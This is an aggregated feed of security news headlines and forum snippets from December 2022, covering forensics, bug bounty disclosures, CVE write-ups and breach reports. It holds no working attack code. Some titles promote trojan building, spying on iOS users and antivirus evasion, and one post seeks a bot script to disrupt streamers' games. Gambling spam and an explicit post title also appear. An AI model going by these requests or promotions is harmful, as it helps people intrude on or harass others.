    Hi all. I am starting out in the forensic discipline and would like some advice, please. Here is my situation. In the company that I work for, sometimes we need to investigate employees' mailboxes due to whistleblowing and other compliance cases. The IT department provides us with a copy of the user mailbox extracted from their O365 account. The data is provided in the PST format. However, the audit team is analyzing the e-mails using Outlook installed on their computers and we are having some problems like file corruption, Outlook freezing, and slow searches. Can you suggest a user-friendly and low-cost solution to perform this kind of e-mail/PST analysis? Thanks all! submitted by /u/Heretic_Dude
    How does the thumbcache really work?
    I ask because it seems random; the last time it was updated was 2 days ago, and even if I open images or Explorer with different icon sizes etc., nothing happens. submitted by /u/SavingsVersion3934
    UFS Explorer still finds large files on SSD even after a retrim command with PowerShell
    How is it technically possible? submitted by /u/SavingsVersion3934
    The Windows Process Journey — dwm.exe (Desktop Window Manager)
    submitted by /u/boutnaru

    Managing Pages
    GitHub disclosed a bug submitted by ali_shehab: https://hackerone.com/reports/1690427 - Bounty: $7500
  • Open

    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on InfoSec Write-ups »
    Upgrading Kali Linux to the latest version
    No content preview
    Advent of Cyber 2022 [Day 21] MQTT | Have yourself a merry little webcam-Simple Write up
    No content preview
  • Open

    SecWiki News 2022-12-22 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    iPhone question
    Hello! Outside of state governments coordinating with factories at the production level and stuff like that, there’s, on average, a very low chance that someone could take a new iPhone, think iPhone XR when the iPhone box was wrapped in plastic shrink wrap, infect it with a virus or tracking software or something when it is still in the welcome / setup mode at the beginning when you register for an Apple ID and all of that, have it still be in the welcome mode, and then put the phone back in the box and then wrap it in shrink wrap again to make it look new? I know a crazy scenario but I just wanted to know. I’m sure anything is possible technically but wanted to know thoughts. I know iPhones are generally secure I just wanted to know. Thank you!!! submitted by /u/Normal-Question-1994 [link] [comments]
    What Shouldn't Endpoint Protection be installed on? Appliances, VM Cluster Hosts, Firewalls?
    We're running a Palo Alto Cortex anti-malware agent installed on ~500 servers and it's not installed on every "server" on our multiple asset lists, but it shouldn't be installed on EVERYTHING, right? We've got network authentication appliances (Aruba ClearPass), DNS internet filters (Cisco Umbrella), servers for SIP trunking and VoIP stuff, Oracle Database Appliances. So far it hasn't given us many problems, but what is the 1000-IQ theory of action here? submitted by /u/sysbaddmin [link] [comments]
    Resume Format for Cyber Security Analyst?
    Does anyone have a resume format for cyber security analyst, for those people who are currently working in a different profession but have managed to learn about EH by themselves? submitted by /u/Cyb3r1nd1an [link] [comments]
    How does integrating TheHive with MISP and/or Cortex actually work?
    Hello guys, while doing my project for work, a few questions arose, and I will be more than happy to get some information or useful tips from people with experience with the technologies or in the field! :) The SOAR we are going to use is Shuffle. What can be achieved with those integrations and what are the differences? How do those systems work together in the SOC environment? Are the cases updated automatically in TheHive with the information from MISP/Cortex, or should they be configured to be updated automatically if certain conditions are matched with a SOAR? Is it a good practice to use both MISP and Cortex, and how do they work together and what's the difference? submitted by /u/tryingtoworkatm [link] [comments]
  • Open

    Hack Analysis: Omni Protocol, July 2022
    Introduction Continue reading on Immunefi »
  • Open

    Java Claus is back with a fuzzing tutorial
    Article URL: https://www.youtube.com/watch?v=rYSvBANQBB0 Comments URL: https://news.ycombinator.com/item?id=34093239 Points: 1 # Comments: 0
  • Open

    AzureHound: a BloodHound data collection tool for Microsoft Azure
    With the help of AzureHound, researchers can easily manage and review the security posture of their Azure environment.
    Vulnerability Reproduction | Django - CVE-2022-28346
    Vulnerability Reproduction | Django - CVE-2022-28346. 1. Vulnerability overview: Django is a free, open-source web framework developed in Python that covers almost every aspect of web applications and can be used to quickly build high-performance, elegant websites; Django provides many modules commonly needed for website back-end development, so developers can focus on the business logic. 2. Vulnerability principle: a crafted dictionary, passed via **kwargs to QuerySet.annotate(), aggregate
    Vulnerability Reproduction | Shiro - CVE-2022-32532
    Given the characteristics of Java regular expressions, the metacharacter . in a regular expression matches any single character except a newline.
    FreeBuf Morning Report | Russian hacker group Killnet claims to have stolen data on over 10,000 FBI agents; ten predictions for the 2023 cybersecurity market
    The well-known Russian Killnet hackers leaked a text file showing login credentials of 10,000 people they claim are FBI agents.
    Behind great-power friction, what are APT groups scheming? | FreeBuf Consulting Insights
    APT attacks are usually the product of long-term operation and planning, and are highly covert.
    On data breaches, ransomware and cloud outages | FB enterprise group topic discussion
    Good evening, Buffers, the 200th FreeBuf enterprise-group topic discussion is here!
    An in-depth analysis of security risks in SEAndroid and how to disable it
    In recent security research, the Wuheng Lab has produced some findings on the attack surface and attack methods of SELinux; we share them here in the hope of exchanging ideas with the industry.
    Python supply-chain attacks keep coming: researchers have found another one
    On December 9, 2022, researchers discovered yet another supply-chain attack in PyPI.
    Took on Apple and Sony: genius hacker George Hotz resigns from Twitter
    The news that genius hacker George Hotz suddenly resigned from Twitter has sparked wide discussion in the community.
    Footwear brand Ecco leaked over 60 GB of sensitive data over 500 days
    Researchers said that not only could anyone have modified the data, but the server's misconfiguration was likely to expose the company to attacks affecting customers around the world.
  • Open

    Puckungfu: A NETGEAR WAN Command Injection
    Yet another Pwn2Own vulnerability patched days before the competition (https://twitter.com/_mccaulay/status/1605886785015480320) submitted by /u/ArbitraryWrite [link] [comments]

  • Open

    Mass account takeover!
    Stripe disclosed a bug submitted by akashhamal0x01: https://hackerone.com/reports/1634165 - Bounty: $4000
    Stored cross-site scripting in dataset owner.
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/708123 - Bounty: $1925
    Ability to perform various POST requests on quantopian.com as a different user - insecure by design.
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/837328 - Bounty: $1050
    Cross-site scripting via hardcoded front-end watched expression.
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/684544 - Bounty: $1225
    Cross-site scripting on algorithm collaborator
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/615672 - Bounty: $2100
    Host header injection that bypassed protection and allowed accessing multiple subdomains
    Urban Company disclosed a bug submitted by musashi42: https://hackerone.com/reports/1783015 - Bounty: $500
    CVE-2022-43551: Another HSTS bypass via IDN
    curl disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1755083
  • Open

    Burp Suite: Best Bug Bounty tool?
    Lots of B’s in the title. You’d think this was a hive. Haha? no? sorry Continue reading on Medium »
    Protecting Your Supply Chain: Essential Strategies for Ensuring Security
    Earlier this month, a ransomware attack occurred at Mercury IT, a managed service provider based in New Zealand with 25 employees. This… Continue reading on Medium »
    My First Bug in Bugcrowd
    Hi everybody Continue reading on Medium »
    Zero Click To Account Takeover (IDOR + XSS)
    Use IDOR & stored XSS to takeover victim account without any user interaction!! Continue reading on System Weakness »
    Our Top 5 favorites Mobile Hacking Tools
    Hacking tools very useful for mobile security. Continue reading on Medium »
    RCE on admin panel of web3 website
    Hello Hackers… Continue reading on Medium »
    Website update and Bug Bounty event
    Hello, Matrix community! Continue reading on Medium »
    DAYSTARTER, Bug Bounty Has Started!
    DAYSTARTER, Bug Bounty Has Started! Continue reading on Medium »
    DAYSTARTER, Bug Bounty program has started
    DAYSTARTER, Bug Bounty program has started Continue reading on Medium »
    Christmas holidays with PVS-Studio
    On the eve of the Christmas holidays, our team has prepared various treats and gifts for you. Continue reading to find out which ones! Continue reading on PVS-Studio »
    Account Takeover and Two-Factor Authentication Bypass
    In September I decided to search in recovery flow processes in web and mobile Facebook application. Continue reading on Medium »
  • Open

    ACSC 'Essential Eight' Definition of Network Devices
    Hi Everyone, We are looking to start aligning and reporting against the ACSC Essential Eight framework. It's pretty straightforward, but there is one part we can't agree on how to interpret the requirements. They mention 'Network Devices' in a few of the Requirements. Such as "Patches, updates or vendor mitigations for security vulnerabilities in operating systems of workstations, servers and network devices are applied within one month of release." We are split in our thinking. In this context, are Network Devices: Every device 'plugged' into the network. Servers, end user devices, Printers, IoT.... Network Infrastructure devices i.e. Switches, Routers, Firewalls, Access Points. Thanks for any assistance you can provide. submitted by /u/TimBix [link] [comments]
    Would anyone mind reviewing my resume and letting me know your thoughts? Cause I may start looking for new opportunity next year.
    Here: https://imgur.com/a/Kaaeqb8 submitted by /u/No-job-no-money [link] [comments]
    Do hackers target specific individuals or do they mass-hack somehow?
    So my Facebook account got hacked yesterday. I’m not 100% sure as the email from Facebook says the login was blocked, yet it does show up in my Facebook activity log. They also didn’t log out & didn’t change my password. Now I’m wondering; what do hackers gain from this? My account doesn’t have my full name, no pics, and only 3 friends. So I’m doubtful someone targeted me specifically. So what do professional hackers gain from this then? And how do they find the accounts to target? And why is it so that they don’t always do something at all, like in my case? I’ve checked whether my email is pwned and it wasn’t. Also I did have an easy password (but not a general one like abc123 or something, but no numbers or capital letters or symbols), and no 2FA (on all my emails and my other social media I do, but because I barely use Facebook I haven’t bothered to set it up and make a hard password until yesterday). submitted by /u/IDontAgreeSorry [link] [comments]
    Using the Nmap Scripting Engine
    Found this old video of someone explaining: a) What the Nmap scripting engine is in a much smarter way than usual. b) A very interesting way of searching through them I had never seen/thought of. TL;DR Definitely worth watching!!!! https://www.youtube.com/watch?v=BeZzi8zyZZc submitted by /u/0rekcaH1 [link] [comments]
    Anyone else have issues with Sucuri / GoDaddy hosting? Sucuri possibly hacked?
    I am currently seeing something that looks like cache poisoning with Sucuri and GoDaddy hosting. Randomly my sites will go down and get replaced with a malicious link with popups. Sucuri has currently admitted that something is going on and they removed malicious content but at the same time they are saying the site is not at risk (what??). We have people alerting us that they are literally getting malicious popups (so how is that not at risk??). Sucuri is being about as transparent as concrete about this. Anyone else dealing with this? submitted by /u/paack [link] [comments]
  • Open

    SecWiki News 2022-12-21 Review
    Open-source intelligence mining from institutional financial reports by ourren; Kaggle knowledge point: Sklearn anomaly detection methods by ourren; Peeking into the caches of large public DNS resolvers by ourren; Summary of Thinkphp3.2.3 SQL injection by SecIN Community; for more of the latest articles, visit SecWiki
  • Open

    A journey into IoT - Unknown Chinese alarm - Part 4 - Internal communications
    submitted by /u/0xdea [link] [comments]
    Deconstructing and Exploiting CVE-2020-6418
    submitted by /u/surrealisticpillow12 [link] [comments]
    DirtyCred Remastered: UAF to LPE (CVE-2022-2602)
    submitted by /u/Void_Sec [link] [comments]
    Cisco BroadWorks CommPilot Application Software Unauthenticated Server-Side Request Forgery (CVE-2022-20951)
    submitted by /u/smaury [link] [comments]
    Exploring the depths of Istio: A researcher's guide to analyzing a caching vulnerability
    submitted by /u/jat0369 [link] [comments]
  • Open

    Become an OSINT Expert: A Comprehensive Guide to the Best Learning Resources
    As the world becomes increasingly digitized, the ability to effectively gather and analyze information from publicly available sources —… Continue reading on Medium »
  • Open

    Creating Trojan Virus in 5 minutes
    Introduction Continue reading on Medium »
    ACTIVE DIRECTORY 101
    This blog is part of a series on Active Directory Security and Red Teaming designed to introduce you to Active Directory and Active… Continue reading on Medium »
  • Open

    Meddler-in-the-Middle Phishing Attacks Explained
    Meddler-in-the-Middle (MitM) phishing attacks show how threat actors find ways to get around traditional defenses and advice. The post Meddler-in-the-Middle Phishing Attacks Explained appeared first on Unit 42.
  • Open

    Advent of Cyber 2022 [Day 20] Firmware | Binwalkin’ around the Christmas tree-Simple Write up
    No content preview
    TryHackMe — Warzone 2 Write-up with Answers
    No content preview
    How to spy on people on iOS
    No content preview
  • Open

    Systemd-coredump: CVE-2022-4415: local information leak
    Article URL: https://www.openwall.com/lists/oss-security/2022/12/21/3 Comments URL: https://news.ycombinator.com/item?id=34079682 Points: 85 # Comments: 44
  • Open

    FreeBuf Morning Report | GitHub repositories hacked, Okta source code leaked; 85% of attacks use encrypted channels
    Okta, a leading provider of authentication services and identity and access management (IAM) solutions, said its private GitHub repositories were breached this month and the attackers stole Okta's source code.
    Looking at XXE trigger mechanisms and the corresponding defenses from the JDK source code
    This article mainly analyzes two of the sinks involved in XXE.
    What do you think? Zhang Xiaolong launches the WeChat keyboard, not for the market but to protect user privacy
    Privacy protection will be the trump card that lets the WeChat keyboard beat other input methods.
    Russian hackers targeted a NATO refinery during the Russia-Ukraine war
    The attack took place on August 30, 2022, and was one of several attacks orchestrated by an advanced persistent threat (APT) of the Russian Federal Security Service (FSB).
    Registration open | "Beike Security TIME": the 2nd White Hat Summit and BKSRC 3rd anniversary celebration
    "Beike Security TIME": the 2nd White Hat Summit and BKSRC 3rd anniversary celebration. Let's gather online; from a new starting point, let's create new glory together!
    NIO hit by ransomware attack, vehicle owner data leaked
    After a preliminary internal investigation, NIO acknowledged that the stolen data consisted of some basic user information and vehicle sales information from before August 2021.
    Camille: a privacy-compliance detection tool
    Camille is a Frida-based auxiliary tool for Android app privacy-compliance detection; it can hook sensitive Android APIs and detect whether they are called by third-party SDKs, helping to check compliance with privacy standards in privacy-compliance scenarios.
  • Open

    Windows Privilege Escalation: Server Operator Group
    Background: The Windows Server operating system uses two types of security principals for authentication and authorization: user accounts and computer accounts. These accounts are created
  • Open

    40+ digital forensics conferences in 2023
    submitted by /u/raydenvm [link] [comments]
    Help with CyberChef Challenge #16
    It's me again, now I'm stuck on #16. I've figured out (from base64>bzip2 decompress>from base32) but from there I'm lost. I've messed around in CyberChef and thrown everything at the wall with no luck. Any ideas? submitted by /u/circuitidiot [link] [comments]

  • Open

    New Chaes campaign uses Windows Management Instrumentation Command-Line Utility
    submitted by /u/PENGUINPLOW [link] [comments]
    Validating Okta Access Tokens in Python with PyJWT
    submitted by /u/csanders_ [link] [comments]
    Bypass iOS backup's TCC protection
    submitted by /u/surrealisticpillow12 [link] [comments]
    Using Leaking Sentinel Value to Bypass the Latest Chrome v8 HardenProtect
    submitted by /u/surrealisticpillow12 [link] [comments]
    OSV-Scanner: A vulnerability scanner written in Go which uses the data provided by OSV.dev
    submitted by /u/Titokhan [link] [comments]
    Writeup about an authentication bypass and privilege escalation in the Passwordstate password manager
    submitted by /u/parzel [link] [comments]
    Intro to Embedded RE: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]
  • Open

    Unauthorized Canceling/Unsubscribe TaxJar account & Payment information DIsclosure
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1679124 - Bounty: $500
    [Broken Access Control ] Unauthorized Linking accounts & Linked Accounts info DIsclosure
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1672614 - Bounty: $250
    Missing length validation of user displayname allows to generate an SQL error
    Nextcloud disclosed a bug submitted by errorx404: https://hackerone.com/reports/1588562
  • Open

    BlockPI Network works with Immunefi to launch a Bug Bounty
    We are pleased to announce the launch of our bug bounty program with the leading Web3 bug bounty platform, Immunefi. Users and… Continue reading on Medium »
    How do Capabilities actually work? | Exploitation | Privilege Escalation
    Continue reading on Medium »
    In this article, I’ll tell you how I got a 4 digits(₹) bounty from an Indian company.
    What is Broken Link Hijacking? Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link… Continue reading on Medium »
    How I found my first XSS on a Bug Bounty Program
    Hello there, Welcome back to my Article. Continue reading on Medium »
    How I got my SIDN Swag
    Hello guys, how are you? I’m writing an article after a very long time. Continue reading on Medium »
    How to search for SSRF flaws effectively?
    SSRF, or Server-Side Request Forgery, is a type of cyberattack that allows an attacker to send requests from a server to… Continue reading on Medium »
    process injection enumeration tool
    Wanderer Continue reading on Medium »
    ONLYOFFICE on HackerOne: 2022 overview
    About ONLYOFFICE bounty program Continue reading on ONLYOFFICE »
    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on InfoSec Write-ups »
  • Open

    Jackbox script
    I am wondering if I could get any help making a Jackbox audience script that lets me join with like a million instances and have them all go for the same choice... I am also wanting to be able to change scores in Jackbox games to troll streamers... I saw someone do that on a stream yesterday, a million bots and taking away like 1 trillion points... How do I make this? I was thinking like a GUI submitted by /u/NaughtiiiiMari [link] [comments]
  • Open

    Just some pics and videos of us having sex
    Please be kind and let us know what you enjoyed 😉 submitted by /u/nosnebn6 [link] [comments]
    christmas worksheets/coloring pages!
    submitted by /u/lambda077 [link] [comments]
    coloring pages!
    submitted by /u/lambda077 [link] [comments]
  • Open

    Property-based and Generative testing for Microservices
    The software development cycle for microservices generally includes unit testing during the development where mock implementation for the… Continue reading on Medium »
  • Open

    Project Proposal for me to go back to school
    To start, I am 26 years old and would like to go back to school for a Master's in Cyber Security with the company's tuition reimbursement program. I would not spend a dime out of my own pocket. To get this approved, the company said I needed to write a project proposal for them. What do you guys think? Good enough to hit send? ​ Dear [Company Name], I am writing to propose that I return to school to pursue a Master's degree in Cyber Security. I believe that this investment in my education will have significant benefits for both myself and the company. Obtaining a Master's degree in Cyber Security will give me a comprehensive understanding of the latest technologies and best practices in the field. This will make me a valuable asset to the company as I will be able to better protec…
    HOWTO Browse Websites Behind The Great Firewall of China?
    Hi, trying to go from not China into China to view some websites that are blocked by the Great Firewall of China. There's a few websites that recommend this V-P-N or that V-P-N. Those products give a Chinese IP, but timeout when trying to view a Chinese website that's behind the great firewall. Tried a few SOCKS proxy sites that also didn't work. Any ideas? submitted by /u/opethharlequinforest [link] [comments]
    DNS interaction via XML-RPC API
    Hello good folks, while testing a site I found DNS interaction via the XML-RPC API. The pingback.ping method is enabled on that site, so I used the interactsh-client URL as callback, example: pingback.ping interactsh-client url here. I sent this request through Burp Repeater and the response code was 200. I got the response of the DNS interaction on the CLI interface of interactsh as well. But I know this can't be submitted. Is there anything else to share? Thanks submitted by /u/ArchurCl4w [link] [comments]
    Standardized Tool Kits
    How often do Red Teams and Pen Test Organizations have their own tools and TTPs? Or is it more often the responsibility of each individual to bring their own tools and TTPs? submitted by /u/dfclin073 [link] [comments]
  • Open

    SecWiki News 2022-12-20 Review
    Overview of WebSocket communication security by 路人甲; The red-team Java code audit lifecycle by 路人甲; SecWiki Weekly (issue 459) by ourren; [HTB] Olympus Writeup by 0x584a; for more of the latest articles, visit SecWiki
  • Open

    Multi Reverse Shell Handler
    Introduction Continue reading on Medium »
    [RedDev #5] Rundll32 COM Hijack executor in C++
    Simple explanation of how COM is executed via rundll32 with the switch -sta / -localserver Continue reading on Medium »
    HACKING CYBORG[TryHackMe] : CTF CHALLENGE
    Arise, young hacker! You've been introduced to the techniques to hack a machine. Good. Now it's time to hack Cyborg, that human machine of… Continue reading on Medium »
    Grouping your penetration testing artifacts [the art of organized testing]
    Storing testing artifacts and screenshots is important for several reasons. Firstly, it allows for the documentation and analysis of the… Continue reading on System Weakness »
  • Open

    Building a Strong Foundation With the Information Security Accelerator
    Bottom Line Up Front Common threats like malware, ransomware, web application hacking, insider and privilege misuse, and targeted intrusions don’t have to spell disaster. Mid-market companies and small-to-medium businesses (SMBs) can cut through the confusion of how to build a solid security program. Our Information Security Accelerator service is designed to help your organization chart... The post Building a Strong Foundation With the Information Security Accelerator appeared first on TrustedSec.
  • Open

    [Original] Understanding buffer overflow vulnerabilities in one article
    We hope this article explains buffer overflows thoroughly, from the basics to the depths.
    How to use ADFSRelay to analyze and research NTLM relay attacks against ADFS
    ADFSRelay is a powerful proof-of-concept tool that helps researchers analyze and research NTLM relay attacks against ADFS.
    How to use AzureGraph to collect Azure Active Directory information via Microsoft Graph
    AzureGraph is an information-gathering tool for Azure Active Directory, built on Microsoft Graph.
    Tophant's "DayBreak", the industry's first community-edition BAS, officially released
    A community-edition BAS platform for validating defense effectiveness, free to download; come and try it!
    UK telecom regulations carry fines of up to 10%, and the cybersecurity law also sharply raises penalties: is global compliance tightening?
    The amendments to both countries' cybersecurity laws also show that cybersecurity regulations will keep pace with the times and become increasingly strict.
    Microsoft discovers macOS vulnerability that lets attackers bypass security checks to deploy malware
    Attackers can exploit the vulnerability to bypass the Gatekeeper security mechanism and deploy malware on vulnerable macOS devices.
    German hotel chain H-Hotels hit by Play ransomware attack, customer data possibly leaked
    Recently, the Play ransomware gang claimed to have carried out a cyberattack on H-Hotels (h-hotels.com), which disrupted the company's communications.
    FreeBuf Morning Report | Top ten data breaches of 2022; cybersecurity market still grew 16% despite worsening economy
    Despite worsening economic conditions, the cybersecurity market still grew 15.9% in the third quarter of this year.
    Understanding the "Twenty Data Measures" in one article: building a foundational data institutional framework
    Run security through the entire data governance process, build a multi-party collaborative governance model involving government, enterprises and society, innovate government governance methods, and clarify the responsibilities and obligations of all parties.
    Fortnite developer pays record $520 million settlement over privacy violations and dark patterns
    This is the FTC's largest ever administrative order and the largest refund amount in a gaming case in history.
  • Open

    Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine
    Ukraine and its cyber domain has faced ever-increasing threats from Russia. We give a timely update on APT group Trident Ursa (aka Gamaredon). The post Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine appeared first on Unit 42.
  • Open

    TryHackMe writeup: Daily Bugle
    The Daily Bugle is a fake newspaper in the world of Spiderman. In this article, it's gonna get r00ted and pwn'd hard! Continue reading on InfoSec Write-ups »
    Write-up: Authentication bypass via encryption oracle @ PortSwigger Academy
    No content preview
    Using ChatGPT to Create DarkWeb Monitoring Tool
    No content preview
    How I found my first RCE? A simple one…
    No content preview
    Use nim compiled language to evade Windows Defender reverse shell detection
    No content preview
    Advent of Cyber 2022 [Day 16] Secure Coding | SQLi’s the king, the carolers sing | Simple Write up
    No content preview
    Burp Suite Extension Development
    No content preview
    Advent of Cyber 2022 [Day 17] Secure Coding | Filtering for Order Amidst Chaos-Simple Write up
    No content preview
    CVE-2022-42710: A journey through XXE to Stored-XSS
    No content preview
  • Open

    [HOT] ON JANUARY 1, 2023, RECEIVE LUCKY MONEY AND TRY THE NEW GAME SODO XSST
    🔰What could set the whole betting market on fire right now is Sodo XSST. Receiving an invitation to attend and celebrate the 12th Founding Anniversary… Continue reading on Medium »
    COME AND TAKE A LOOK, GUYS
    🔍Soi Cầu 6666 is considered one of the lottery-number prediction methods you must try once. Discover it with TK88 today! 🔍Continuously updated… Continue reading on Medium »
  • Open

    GoodGames HackTheBox Walkthrough
    Summary GoodGames is a Linux machine and is considered an easy box, but it was tricky indeed. On this box, we will begin with a

  • Open

    Adversary catalogue with industry and country mappings?
    Does anybody know of a good data repository that contains a list of threat actors mapped to the countries and industries/sectors that they target. Like what Palo Alto's Unit 42 ATOMs project did for malware (https://unit42.paloaltonetworks.com/atoms/), but for threat actors and APTs. Something like CrowdStrike's Adversary Universe project (https://adversary.crowdstrike.com/), but they only cover a small sample (of 20) threat actors. Surprisingly, MITRE ATT&CK groups doesn't really cover either of these details. MISP project (https://raw.githubusercontent.com/MISP/misp-galaxy/main/clusters/threat-actor.json) has target countries, but doesn't cover industries/sectors. Wondering if anybody knows of any others that would cover both of these? TIA!!! EDIT: When I say MITRE ATT&CK groups don't have these details, I specifically mean they aren't there in any structured format (i.e. it's not indexed in the JSON data as unique data points). In some cases however, these details are included in some of the group descriptions. submitted by /u/drstarskymrhutch [link] [comments]
    Where are traces in attacker's machine stored?
    Where are traces of using Kali (cause it's the most used by hackers) tools stored inside the system for forensics when the attacker's device is found during an investigation, if he didn't delete or wipe them? In other words, where is the evidence of the crime stored inside the system (if he has Kali on USB, CD, dual booted or even a VM)? Hope my question is clear. Thank you in advance for your time reading my post. submitted by /u/Big-Status8393 [link] [comments]
    Home PC calls to Letsencrypt.org domains
    I didn't install this certificate and as I understand it is not needed for normal people/PCs. I'm using ProtonVPN, they are also based in Switzerland so maybe that's why? But why would my PC need a certificate saying I'm trusted?? submitted by /u/VeggieReggie808 [link] [comments]
    Is there a name for a service which will send an email if you do not respond within x hours or x days?
    I am urgently looking for the name of the following service: A piece of software/service which will send an email with content, a password for instance, as follows: When Bob is not responding within X days with a 'ping' to the service, we assume his hiking trip in the jungle of Borneo went wrong and his trusted companion Alice gets an email which enables her to take control of Bob's systems. I tried googling, I know it exists and there is a name for this type of service, but I cannot find it, I cannot even find commercial services. I am a non-native English speaker, perhaps I am using the wrong terms (Dutch). I do need it for a friend. I am not a netsec engineer. Any help is greatly appreciated! submitted by /u/fritsboks [link] [comments]
    Help desk in Europe with IBM certification
    I thought about starting my career in IT from HelpDesk with this certification from IBM because CompTIA certs aren't valued in Europe, they are more US based. I'm 23 and I attend an evening computer high school for adults who dropped out of their studies in adolescence. I finish it in 2 years but I want to start working next year. What do you think about this cert? https://www.coursera.org/professional-certificates/ibm-technical-support#courses submitted by /u/HelloWorldCLang [link] [comments]
    What is OSINT and where to start
    OSINT (Open Source Intelligence) is the process of collecting, analyzing, and disseminating information from publicly available sources…
    5 Methods for Tracking Planes and Ships That Aren’t Twitter — Rae Baker: Deep Dive
    With the new ban on live-tracking going into effect along with the other constantly shifting changes taking place over on Twitter, I…
    Gatekeeper’s Achilles heel: Unearthing a macOS vulnerability
    Article URL: https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=34059037
    Critical Windows code-execution vulnerability went undetected until now
    Article URL: https://arstechnica.com/information-technology/2022/12/critical-windows-code-execution-vulnerability-went-undetected-until-now/ Comments URL: https://news.ycombinator.com/item?id=34056194
    Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg
    submitted by /u/Void_Sec
    Beware of this CI/CD vulnerability: GitHub Environment Injection (Google & Apache found vulnerable)
    submitted by /u/roy_6472
    EDR evasion with hardware breakpoints
    New research of mine talking about EDR evasion using hardware breakpoints. submitted by /u/Fun_Preference1113
    clif - a command-line application fuzzer in Rust
    submitted by /u/andy-codes
    MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
    A TP-Link router stack overflow vulnerability patched days before Pwn2Own 2022 (https://twitter.com/_mccaulay/status/1604813519572160513) submitted by /u/ArbitraryWrite
    Port knocking from scratch
    submitted by /u/CoolerVoid
    Looking for an iCloud account (test, not a real one) with ADP
    For some personal research, I'm looking for someone who has access to a test iCloud account that has Advanced Data Protection enabled. I'll just need it for a day or two, then I'll be off. I tried changing the address of one of my test accounts to the US, but I got this error from Apple :) : https://imgur.com/a/9uefZme submitted by /u/Loutilout
    Help with CyberChef Challenge #5 CTF
    I've made it this far, and the decoded hex clearly has a bzip2 header, but I think the rest is encoded somehow? I've tried all I can think of for the last day, but I cannot get it to spit out anything valid... Thank you! Link to CTF: https://preview.redd.it/ytyk68ytzv6a1.png?width=1916&format=png&auto=webp&s=d2b898ed45a02dcf96a9a5ffc1346a04512a5707 submitted by /u/circuitidiot
    The Dissect Effect - An Open Source IR Framework
    Good morning, Merry Christmas to all of you who celebrate! Here’s a new 13Cubed episode about Dissect -- a powerful, now open source, IR framework. Enjoy! ----- In this episode, we'll take a look at the recently open-sourced Dissect incident response framework from Fox-IT. We'll briefly examine the overall capabilities of the software, then we'll install it within a WSL 2 environment, and lastly, we'll take it for a test drive using a Windows Server 2019 disk image. Episode: https://www.youtube.com/watch?v=A2e203LizAM Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed
    Second/Third Gen File Carving Tools
    Hi everyone, I’m an undergrad student and am assisting with a research project that involves carving files from a bin file. I’ve used many open source file carving tools (Autopsy, Scalpel, Foremost, etc.) but they don’t find anything. I modified Scalpel’s config file to include more file types but got way too many false positives. From what I understand, this can be a problem with all first generation (header-footer based) tools. I’ve been reading about second gen tools, which use file structure information, and third gen tools, which are block content based. I’ve found frameworks for developing such tools but am wondering if there are any pre-existing ones available. Any recommendations are appreciated; they don’t have to be open source/free, and it’s also okay if they’re for law enforcement use only. Thank you in advance! submitted by /u/yazzyf
    Found a USB, want to safely plug it in and inspect
    Any tutorials on setting this up for inspection? submitted by /u/Bulevine
    Gatekeeper’s Achilles heel: Unearthing a macOS vulnerability
    submitted by /u/SCI_Rusher
    EDR evasion with hardware breakpoints
    New research of mine talking about hardware breakpoints for EDR evasion. submitted by /u/Fun_Preference1113
    Paper HackTheBox Walkthrough
    Paper is a Linux machine and is considered an easy box by Hack The Box. On this box, we will begin with a basic port
    SecWiki News 2022-12-19 Review
    The design philosophy of the Tai-e (太阿) static program analysis framework, by ourren; 2022 Recorded Future C&C server tracking report, by Avenger. For more of the latest articles, visit SecWiki.
    Just a little folder full of games I found while following a link on Rogue Basin.
    submitted by /u/fleegle2000
    Installing DVWA in Docker to learn web penetration testing
    Hello everyone, this time I will share how to install DVWA using a Docker container, for those of you who…
    BUG BOUNTY JOURNEY
    BBJ-101:
    IW Weekly #38: Cache Poisoning, XSS Payloads, Akamai and Amazon S3 buckets, Hybrid Fuzzing in…
    FreeBuf Morning Report | Former Twitter employee sentenced to prison for espionage; Tesla update in China
    Tesla update in China: Sentry Mode adjusted and new security features added; ByteDance's Jeddak Team achieves strong results in the iDASH 2022 privacy computing competition.
    "Practice Guide for Cybersecurity Standards: Security Certification Specification for Cross-Border Processing of Personal Information V2.0" released
    The Practice Guide sets out the basic principles to be followed when processing personal information across borders, and the personal information protection obligations of personal information processors and overseas recipients in such activities.
    Google takes Gmail security to a new level with client-side encryption
    At a time when concerns about online privacy and data security have reached an all-time high, this is undoubtedly a welcome change.
    Fire and rescue agency of the Australian state of Victoria hit by cyberattack
    The fire and rescue agency of the Australian state of Victoria has suffered a cyberattack; it has shut down its network and switched to manual operations.
    Alibaba Cloud Hong Kong servers suffer an "epic" outage
    Alibaba Cloud confirmed that the Hong Kong region failure was caused by a cooling equipment fault at the PCCW data centre in Hong Kong, affecting the use of ECS cloud servers, cloud databases, storage products and other cloud products in Availability Zone C of the Hong Kong region.
    New cross-platform botnet is infecting Minecraft game servers
    A new cross-platform malware botnet named "MCCrash" is infecting Windows, Linux and IoT devices in order to target Minecraft servers.

    How did you set up your password manager?
